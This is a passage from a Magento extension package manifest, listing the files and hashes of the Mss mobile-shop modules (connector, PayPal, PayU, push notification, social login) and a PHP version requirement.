hash="7b93df408b5696a4206a487790a7762f"/><file name="FeedbackController.php" hash="2b9e092984c0c64397cd25fe1d2266d5"/><file name="IndexController.php" hash="4990dde9ef192c497ab98711e88e8925"/><file name="ItemsController.php" hash="bbf85a2f1514ce73e4c0858ebf7d26f9"/><file name="ProductsController.php" hash="28d783cd84dbf6e0bfe6a21cf40cd1a8"/><file name="StaticpagesController.php" hash="86bfe2d07268507d60c4ee3c8834de08"/><file name="StoreinfoController.php" hash="7a69ee08a394ab866871e82cd8827cd4"/><file name="TokenController.php" hash="ebbb672b1587c84ed914cd67bd7dc529"/><file name="WishlistController.php" hash="082445ed48fde71569305aba02177337"/></dir><dir name="etc"><file name="adminhtml.xml" hash="dace418dcc6eee76831169b5c70176e7"/><file name="config.xml" hash="2e89169526036f93ea545f141502e4d2"/><file name="system.xml" hash="09be5e92b65afa6e91d062b3f7082e57"/></dir><dir name="sql"><dir name="connector_setup"><file name="mysql4-install-0.1.0.php" hash="4325ba30b21f9680b11d4b124b9e8181"/><file name="mysql4-upgrade-0.1.0-0.1.1.php" hash="eaa00e880b38ba41580b67785b33ed10"/></dir></dir></dir><dir name="Mpaypal"><dir name="Helper"><file name="Data.php" hash="c3ba57e7cc86210346b1b3f279083c0f"/></dir><dir name="Model"><file name="Mpaypal.php" hash="f49b32aad7d7bed49333534139fd07b7"/><file name="Observer.php" hash="4b92aaf547f0b080d8495cf064574d10"/></dir><dir name="controllers"><file name="IndexController.php" hash="c12439366cff0f0d0813543a2fd90f7f"/></dir><dir name="etc"><file name="config.xml" hash="9ed76ff53b5e0232b4ea442a7e046b14"/><file name="system.xml" hash="2f51ad686858a69e07e8c21baf5d690e"/></dir></dir><dir name="Payu"><dir name="Block"><file name="Index.php" hash="f6a324c1ac4b0c1dcfac775c51c2a34c"/></dir><dir name="Helper"><file name="Data.php" hash="7800e0e58258b78d0f23a7fec482d120"/></dir><dir name="controllers"><file name="IndexController.php" hash="b5254620aaf3913b8639555413d36a26"/></dir><dir name="etc"><file name="config.xml" hash="c6867fb0cc7efdde39c32a3ecbf62433"/></dir></dir><dir name="Pushnotification"><dir name="Block"><dir name="Adminhtml"><file name="Pushnotificationbackend.php" hash="6b9e143ee7b5fe4fc2642eee977b44bf"/></dir></dir><dir name="Helper"><file name="Data.php" hash="c60f7196c3b01881dfe079aec2fad39f"/></dir><dir name="Model"><dir name="Entity"><file name="Resource.php" hash="93b6a261762541433fa601aefb60d0a7"/></dir><dir name="Mysql4"><dir name="Pushnotification"><file name="Collection.php" hash="392612adedcb14ec5dcaaa4ea9858091"/></dir><file name="Pushnotification.php" hash="77f6cadb7682377a1de6b275310c1cf6"/></dir><file name="Pushnotification.php" hash="ad5fe0f74049c61402ff99fc32d8164a"/><dir name="System"><dir name="Config"><dir name="Backend"><file name="File.php" hash="d7c74e49b78bb9da3453bd5f414a445f"/><file name="Image.php" hash="e1d98dbf511fe16581b37a8b7b43f5b4"/><file name="Iosmode.php" hash="ff1794ef4844019b7af64192fbd4e122"/></dir></dir></dir></dir><dir name="controllers"><dir name="Adminhtml"><file name="PushnotificationbackendController.php" hash="ec4ebd0ad1cfee78d2e67a69698a14e5"/></dir></dir><dir name="etc"><file name="config.xml" hash="f62215f94167b81c5f73aea794a334c4"/><file name="system.xml" hash="23a622dec8250a355bbaed9e83f1f82d"/></dir><dir name="sql"><dir name="pushnotification_setup"><file name="mysql4-upgrade-0.1.5-0.1.6.php" hash="418e997bb72afa725389593d4ca2f111"/></dir></dir></dir><dir name="Sociallogin"><dir name="Helper"><file name="Data.php" hash="8965f0b6a0127d0965d99987aa0a300c"/></dir><dir name="Model"><dir name="Mysql4"><file name="Sociallogin.php" hash="b881bc47c5ee70b1c4c02b59501ffbc5"/></dir><file name="Sociallogin.php" hash="0ba90dadb0f34528c2296704c5cea233"/></dir><dir name="etc"><file name="config.xml" hash="eac1dc2364bc283a9cd5326eb7e852a9"/></dir><dir name="sql"><dir name="sociallogin_setup"><file name="mysql4-install-0.1.0.php" hash="163332cb130dae297af332cbefde58f3"/></dir></dir></dir></dir></target><target name="magedesign"><dir><dir name="adminhtml"><dir name="default"><dir name="default"><dir name="template"><dir name="pushnotification"><file name="pushnotificationbackend.phtml" hash="138add7171fdd7fb326abc4a4f9dbe5a"/></dir><dir name="connector"><file name="notification.phtml" hash="164e5f9e7dcfc5c2d2451f0e77776d77"/><file name="support.phtml" hash="7c799c058795eafbf96239e16e3326ca"/><file name="notification.phtml" hash="164e5f9e7dcfc5c2d2451f0e77776d77"/><file name="support.phtml" hash="7c799c058795eafbf96239e16e3326ca"/></dir></dir><dir name="layout"><file name="bannerslider.xml" hash="a5a76f30bbedca5804646d53e783cdac"/><file name="pushnotification.xml" hash="f7fd974e63c4c7eb5ffac7b059470946"/><file name="connector.xml" hash="94731fdd2e7e65ea3ad14bedf43e993b"/><file name="connector.xml" hash="94731fdd2e7e65ea3ad14bedf43e993b"/></dir></dir></dir></dir><dir name="frontend"><dir name="base"><dir name="default"><dir name="layout"><file name="payu.xml" hash="473595488f536cb588c5588a744915a3"/><file name="mpaypal.xml" hash="7b75c5bed6f3142c8bc9e4c1233bf1e9"/></dir><dir name="template"><dir name="payu"><file name="index.phtml" hash="5f54a8eb245364534e7695b1a8fcbf30"/><file name="test.phtml" hash="da4701ff5b2c64444a49f77571e8a00c"/></dir><dir name="mpaypal"><file name="index.phtml" hash="df077c063b2006b9321c96cd6744b19f"/></dir></dir></dir></dir></dir></dir></target><target name="mageetc"><dir><dir name="modules"><file name="Mss_Bannerslider.xml" hash="7d03ee71d8e860c51478aff5200b0deb"/><file name="Mss_Connector.xml" hash="ba8a5609c9c8c3636f183c5bfe04d664"/><file name="Mss_Payu.xml" hash="5feac03d698b481473223fbe6a8814b1"/><file name="Mss_Pushnotification.xml" hash="2e8e9bc56a5f0ff8bb42f43fb5a3a3db"/><file name="Mss_Sociallogin.xml" hash="8671199bdad3bdecbfe0c47ce9ff05e6"/><file name="Mss_Mpaypal.xml" hash="4d6a7f8d862de8c449b1366727ef0a6d"/></dir></dir></target><target name="mageskin"><dir><dir name="frontend"><dir name="base"><dir name="default"><dir name="images"><dir name="magentomobileshop"><file name="magentomobileshop_loader.gif" hash="453272c9cacd32efe6465961ea8a61dd"/></dir></dir></dir></dir></dir></dir></target></contents>
|
18 |
<compatible/>
|
19 |
<dependencies><required><php><min>5.3.0</min><max>7.0.5</max></php></required></dependencies>
|
20 |
</package>
|